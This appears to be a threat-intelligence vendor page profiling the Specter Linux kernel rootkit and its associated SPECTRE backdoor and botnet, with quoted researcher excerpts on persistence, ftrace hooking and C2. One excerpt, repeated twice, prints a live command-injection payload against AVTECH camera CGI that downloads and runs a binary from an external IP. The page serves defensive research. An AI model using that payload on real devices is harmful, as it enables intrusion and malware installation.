Specter is a Linux kernel rootkit integrated with the cross-platform SPECTRE backdoor and used by the financially motivated, Chinese-speaking intrusion group UAT-10147 against compromised Linux servers. It is deployed as a kernel module masquerading as a legitimate component and establishes boot-time persistence through a fraudulent systemd service configured to run before standard system initialization. Specter uses the Linux ftrace framework to redirect selected kernel handlers rather than directly modifying the system-call table. Its kernel-level capabilities include concealing processes and its own module, elevating a process to UID 0, and supporting covert control through signal-based commands. The rootkit is used to provide stealth, persistence, and privileged post-compromise control on Linux systems.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
“Its most significant capability is deployment of the associated Specter Linux kernel rootkit.”
These include the Specter malware family, Ntospy and NET-STAR, a newly identified malware suite.
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Specter spread its Dropper samples through AVTECH IP Camera / NVR / DVR Devices vulnerabilities... The payload being used is as follows: GET /cgi-bin/nobody/Search.cgi?... username=admin ;XmlAp r Account.User1.Username>$(wget http://45.76.70.163:80/style/351f37b2764041759c859202c529aefc.css -O /tmp/webstatus;chmod 755 /tmp/webstatus;/tmp/webstatus;rm -f /tmp/webstatus;)&password=admin
username=admin ;XmlAp r Account.User1.Username>$(wget http://45.76.70.163:80/style/351f37b2764041759c859202c529aefc.css -O /tmp/webstatus;chmod 755 /tmp/webstatus;/tmp/webstatus;rm -f /tmp/webstatus;)&password=admin
To maintain persistence, it utilizes a fraudulent systemd unit file named “hardware-monitor.service”
Persistance via faux service systemd hardware-monitor.service (Before=sysinit.target)
Famille Potato : GodPotato, JuicyPotato (binaires), EfsPotato, RustPotato
To maintain persistence, it utilizes a fraudulent systemd unit file named “hardware-monitor.service”
Persistance via faux service systemd hardware-monitor.service (Before=sysinit.target)
A custom-developed backdoor dubbed SPECTRE and a rootkit called Specter both exhibit indications of AI-assisted development, Talos said.
The rootkit is deployed as a loadable kernel module disguised as “acpi_pad.ko”, allowing it to mimic the legitimate ACPI processor power management module.
Our BotMon tracking system recently highlighted that the Specter botnet family started to use two domains api.github.com and www.ibm.com as C2 domains for its control communicate. | the auto-extracted C2 was api.github.com on its port 80 ... how can Specter uses api.github.com as its C2 communication node and passes control traffic back and forth between github and its bots?
The main functions of Specter are File management Download and upload management... Executing C2 to deliver executable files... SSF Plugin is to download an executable file from a specified server to a local /tmp/runtimes/httpd_log_output file, and then execute it.
The new Specter sample send dns request to C2 ... craft the dns request packets and the ask the DNS IPs described above about the FQDN to finally get the C2 address.
76 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Linux loadable-kernel-module rootkit deployed by SPECTRE. It masquerades as acpi_pad.ko, persists through a fraudulent hardware-monitor.service unit, hides processes and modules, elevates privileges to UID 0, and uses the legitimate ftrace framework to redirect syscall handlers while reducing direct kernel-tampering artifacts.
Linux rootkit associated with UAT-10147. The article says recovered source code suggested portions of its development may have incorporated AI-assisted code-generation workflows.
Linux kernel rootkit used by SPECTRE to hide processes and modules, escalate privileges, and maintain boot persistence via a disguised kernel module and fraudulent systemd service.
Linux kernel rootkit used alongside SPECTRE, disguised as a legitimate ACPI module, persisted via a fake systemd service, using ftrace syscall hooks and signal-based IPC to hide processes/modules and escalate privileges to root.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.